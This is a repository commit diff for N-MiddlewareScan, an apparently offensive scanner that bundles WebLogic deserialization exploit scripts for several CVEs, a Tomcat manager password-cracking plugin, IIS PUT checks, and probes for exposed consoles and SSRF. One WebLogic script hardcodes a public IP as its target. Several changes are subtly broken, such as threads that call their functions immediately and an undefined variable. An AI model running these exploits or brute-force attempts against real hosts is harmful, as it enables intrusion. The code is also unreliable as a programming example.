nihaohello/N-MiddlewareScan
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

1

Browse Source
This commit is contained in:
nihaohello
2019-03-31 15:47:11 +08:00
parent 1d17b331e6
commit 71670dcad6
33 changed files with 190 additions and 113 deletions
Download Patch File Download Diff File Expand all files Collapse all files

45
N-MiddlewareScan.py
View File

@@ -4,18 +4,20 @@
#blog:http://www.youknowi.xin
import sys
import os
import re
import argparse
import traceback
import config
import multiprocessing
from concurrent.futures import ThreadPoolExecutor
from plugins import plugins
#80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080
class MiddlewareScan(object):
def __init__(self,arg,ThreadNum):
def __init__(self,arg,config):
self.arg=arg
self.ThreadNum=ThreadNum
self.config=config
def run(self):
P = plugins.plugins(self.arg,self.ThreadNum)
P = plugins.plugins(self.arg,self.config)
P.run()
def main():
arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete')
@@ -24,31 +26,44 @@ def main():
arg.add_argument('-p', '--options', help='options', dest='options')
arg.add_argument('-t', '--thread', help='thread num', dest='thread')
arg = arg.parse_args()
if len(sys.argv)<=2:
os.system("python "+sys.argv[0]+" -h")
exit()
print("开始检测中间件相关漏洞:")
if arg.thread:
config.ThreadNum=arg.thread
if not arg.options:
arg.options="all"
if arg.url:
if not re.match(r'^https?:/{2}\w.+$', url):
print("输入标准的url如:http://www.baidu.com")
exit()
try:
S=MiddlewareScan(arg,config)
S.run()
except Exception:
print(traceback.print_exc())
if arg.file:
multiprocessing_list=[]
f = open(arg.file, encoding="utf-8")
for url in f.readlines():
url = url.rstrip("\n")
arg.url = url
if not re.match(r'^https?:/{2}\w.+$', url):
if not url.startswith("http"):
arg.url="http://"+url
S = MiddlewareScan(arg, config)
multiprocessing_list.append(S.run())
f.close()
pool=multiprocessing.Pool(config.Process)
try:
with open(arg.file,encoding="utf-8") as f:
with ThreadPoolExecutor(config.ThreadNum) as excetor:
for url in f.readlines():
try:
url=url.rstrip("\n")
S=MiddlewareScan(arg,config)
excetor.submit(S.run())
except Exception:
pass
f.close()
#pool.apply_async(multiprocessing_list)
for i in multiprocessing_list:
pool.apply_async(i)
pool.close()
pool.join()
except Exception:
print(traceback.print_exc())
print("\n\n相关漏洞检测完成。")
if __name__ == '__main__':
print("开始检测中间件相关漏洞:")
main()
main()

BIN
__pycache__/config.cpython-37.pyc
View File

Binary file not shown.

1
config.py
View File

@@ -1,4 +1,5 @@
ThreadNum=50
Process=30
Timeout=6
port=80
#linux

7
plugins/IIS_special_plugin_.py
View File

@@ -38,5 +38,8 @@ def IIS_shortname_Scanner(url):
except Exception as e:
raise Exception('[is_vul.Exception] %s' % str(e))
def IIS_special_plugin_(arg,config):
IIS_PUT(arg,config)
IIS_shortname_Scanner(arg.url)
try:
IIS_PUT(arg,config)
IIS_shortname_Scanner(arg.url)
except Exception:
pass

0
plugins/__init__.py Normal file
View File

BIN
plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/__pycache__/__init__.cpython-37.pyc Normal file
View File

Binary file not shown.

BIN
plugins/__pycache__/plugins.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/__pycache__/special_plugin_.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc
View File

Binary file not shown.

2
plugins/special_plugin_.py
View File

@@ -22,7 +22,7 @@ def special_plugin_(arg,config):
try:
thread.start()
except Exception as e:
print(e)
pass
for t in threads:
t.join()

13
plugins/tomcat_special_plugin_.py
View File

@@ -6,6 +6,7 @@ import uuid
from termcolor import cprint
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import threading
def requests_post(url,username,password,flag_list):
try:
login_url = url + '/manager/html'
@@ -79,6 +80,14 @@ class Exploit:
cprint("[-] " + __file__ + "====>连接超时", "cyan")
def tomcat_special_plugin_(arg,config):
Exploit().attack(arg.url)
crack_password(arg,config)
threads=[]
threads.append(threading.Thread(Exploit().attack(arg.url)))
threads.append(threading.Thread(crack_password(arg,config)))
for thread in threads:
try:
thread.start()
except Exception:
pass
for j in threads:
j.join()

52
plugins/weblogic_poc/CVE_2015_4852.py
View File

File diff suppressed because one or more lines are too long

20
plugins/weblogic_poc/CVE_2016_0638.py
View File

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['weblogic.jms.common.StreamMessageImpl']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception as e:
print("CVE_2016_0638脚本出错")
if __name__=="__main__":
rip = '222.85.76.240'

20
plugins/weblogic_poc/CVE_2016_3510.py
View File

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2016_3510脚本出错")
if __name__=="__main__":
rip = '127.0.0.1'

20
plugins/weblogic_poc/CVE_2017_3248.py
View File

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(7)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -53,14 +54,17 @@ def checkVul(res,server_addr,index):
# print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(rip,rport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[index])
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (rip, rport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, rport)
rs = sendEvilObjData(sock, PAYLOAD[index])
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2017_3246脚本出错")
if __name__=="__main__":
rip = '127.0.0.1'

9
plugins/weblogic_poc/CVE_2017_3506.py
View File

@@ -64,9 +64,12 @@ def poc(url):
result = '[-]目标weblogic未检测到CVE-2017-3506'
return result
def run(rip,rport):
url=rip+':'+str(rport)
result = poc(url=url)
print(result)
try:
url = rip + ':' + str(rport)
result = poc(url=url)
print(result)
except Exception:
print("CVE_2017_3506脚本出错")
if __name__ == '__main__':
run('127.0.0.1',7001)

22
plugins/weblogic_poc/CVE_2018_2628.py
View File

@@ -20,6 +20,7 @@ VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(6)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
@@ -63,15 +64,18 @@ def checkVul(res,server_addr,index):
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(dip,dport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,dport)
rs=sendEvilObjData(sock,PAYLOAD[index])
# print 'rs',rs
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
# print 'rs',rs
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2018_2628脚本出错")
if __name__=="__main__":

23
plugins/weblogic_poc/CVE_2018_2893.py
View File

@@ -21,6 +21,7 @@ VER_SIG=['StreamMessageImpl']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.settimeout(6)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
data = sock.recv(1024)
@@ -66,16 +67,18 @@ def checkVul(res,server_addr,index):
print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
def run(dip,dport,index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,dport)
rs=sendEvilObjData(sock,PAYLOAD[index])
#print 'rs',rs
checkVul(rs,server_addr,index)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
##打了补丁之后会阻塞所以设置超时时间默认15s根据情况自己调整
sock.settimeout(10)
server_addr = (dip, dport)
t3handshake(sock, server_addr)
buildT3RequestObject(sock, dport)
rs = sendEvilObjData(sock, PAYLOAD[index])
# print 'rs',rs
checkVul(rs, server_addr, index)
except Exception:
print("CVE_2018_2893脚本出错")
if __name__=="__main__":
# dip = sys.argv[1]
# dport = int(sys.argv[2])

BIN
plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc
View File

Binary file not shown.

BIN
plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc
View File

Binary file not shown.

13
plugins/weblogic_poc/managerURL200.py
View File

@@ -19,11 +19,14 @@ def islive(ur,port):
return r.status_code
def run(url,port):
if islive(url,port)==200:
u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
else:
print("[-]目标weblogic控制台地址未找到!")
try:
if islive(url, port) == 200:
u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp'
print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
else:
print("[-]目标weblogic控制台地址未找到!")
except Exception:
print("managerURL200脚本出错")
if __name__=="__main__":
url = sys.argv[1]

12
plugins/weblogic_poc/uddi_ssrf.py
View File

@@ -20,10 +20,14 @@ def islive(ur,port):
return r.status_code
def run(url,port):
if islive(url,port)==200:
print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/')))
else:
print("[-]目标weblogic UDDI组件默认路径不存在!")
try:
if islive(url, port) == 200:
print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format(
'http://' + str(url) + ':' + str(port) + '/uddiexplorer/')))
else:
print("[-]目标weblogic UDDI组件默认路径不存在!")
except Exception:
print("uudi_ssrf脚本出错")
if __name__=="__main__":
url = sys.argv[1]

40
plugins/weblogic_special_plugin_.py
View File

@@ -8,44 +8,62 @@ from plugins.weblogic_poc import CVE_2018_2628
from plugins.weblogic_poc import CVE_2018_2893
from plugins.weblogic_poc import managerURL200
from plugins.weblogic_poc import uddi_ssrf
import threading
import socket
def weblogic_special_plugin_(arg,config):
port=7001
ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
threads=[]
threads.append(threading.Thread(CVE_2015_4852.run(ip,port)))
threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0)))
threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0)))
threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0)))
threads.append(threading.Thread(CVE_2017_3506.run(ip,port)))
threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0)))
threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0)))
threads.append(threading.Thread(managerURL200.run(ip,port)))
threads.append(threading.Thread(uddi_ssrf.run(ip,port)))
#print(arg.url)
try:
CVE_2015_4852.run(ip,port)
for thread in threads:
thread.start()
for j in threads:
j.join()
'''
try:
threads[0].strat()
except Exception:
print("CVE_2015_4852 脚本出错")
try:
CVE_2016_0638.run(ip,port,0)
threads[1].start()
except Exception:
print("CVE_2016_0638 脚本出错")
try:
CVE_2016_3510.run(ip,port,0)
threads[2].start()
except Exception:
print("CVE_2016_3510 脚本出错")
try:
CVE_2017_3248.run(ip,port,0)
threads[3].start()
except Exception:
print("CVE_2017_3248 脚本出错")
try:
CVE_2017_3506.run(ip,port)
threads[4].start()
except Exception:
print("CVE_2017_3506 脚本出错")
try:
CVE_2018_2893.run(ip,port,0)
threads[5].start()
except Exception:
print("CVE_2018_2893 脚本出错")
try:
CVE_2018_2628.run(ip,port,0)
threads[6].start()
except Exception:
print("CVE_2018_2628 脚本出错")
try:
managerURL200.run(ip,port)
threads[7].start()
except Exception:
print("managerURL200 脚本出错")
try:
uddi_ssrf.run(ip,port)
threads[8].start()
except Exception:
print("uddi_ssrf 脚本出错")
print("uddi_ssrf 脚本出错")
'''

4
test.py Normal file
View File

@@ -0,0 +1,4 @@
import re
url="https://baidu.comas.as"
if re.match(r"{2}\w.+$", url):
print("aaaaaaa")